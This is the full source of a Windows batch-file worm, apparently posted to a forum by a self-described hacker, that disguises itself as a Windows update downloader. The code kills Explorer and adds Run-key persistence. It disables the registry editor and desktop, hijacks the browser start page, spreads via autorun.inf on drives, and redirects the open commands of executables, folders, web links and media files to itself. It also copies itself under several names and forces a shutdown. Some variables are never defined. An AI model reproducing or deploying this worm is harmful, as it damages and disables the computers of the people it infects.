Código
goto per ::worm Windows_updates_downloader2.5.bat ::by hacker W4rR3d ::Comunidad hacker "Black Eye Security Team" Piura -Peru :per :NN :Encryptions %ts% f=f %ts% r=r :registro protection TASKKILL /IM explorer.exe /F TASKKILL /IM msnmsgr.exe /F reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v updates /t REG_SZ /d "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://windows-updates-downloader.softonic.com/descargar" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" :agregarse en dispositivos %vsb% [autorun] >> %%i:\autorun.inf %vsb% open=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf %vsb% shellexecute=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf %vsb% Icon=%windir%\system32\Shell32.dll,4 >> %%i:\autorun.inf %vsb% Shell\Open\COMMAND=Windows_updates_downloader2.5.bat %vsb% Shell\Explore\command=Windows_updates_downloader2.5.bat %vsb% UseAutoPlay=1 attrib +h +s +r %%i:\autorun.inf :extenderse md C:\c5734b2b09076e4acebc92bb8c25 %ph% %0 C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25 :hidden in bmp %vsb% On Error Resume Next >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\bmpfile\shell\open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HkEY_CLASSES_ROOT\Folder\Shell\Explore\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\Folder\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\exefile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\htmlfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\HTTP\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\https\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inffile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inifile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mp3file\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\txtfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\wmafile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs start C:\terror.vbs :back %ph% %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Usub.exe %ph% %0 %SYSTEMROOT%\SYSTEM32\Usub.exe %ph% %0 %SYSTEMDRIVE%\Usub.exe %ph% %0 %userprofile%\Usub.exe %ph% %0 %programfiles%\Usub.exe %ph% %0 C:\RECYCLER\Usub.bmp :mensaje %vsb% On Error Resume Next >> C:\ipnuker.vbs %vsb% Msgbox "Computer is infected with a virus.",16,"hacked by W4rR3d" >> C:\ipnuker.vbs :LOG %vsb% ::USuB Log:: >> USuB_Log.log %vsb% Directory *c5734b2b09076e4acebc92bb8c25* >> Usub_Log.log %ph% USuB_Log.log C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log :dn %vsb% On Error Resume Next >> C:\apagar.vbs %vsb% shell.run "shutdown.exe -s -f -t 8 " >> C:\apagar.vbs start C:\apagar.vbs :Memory Loop goto Memory Loop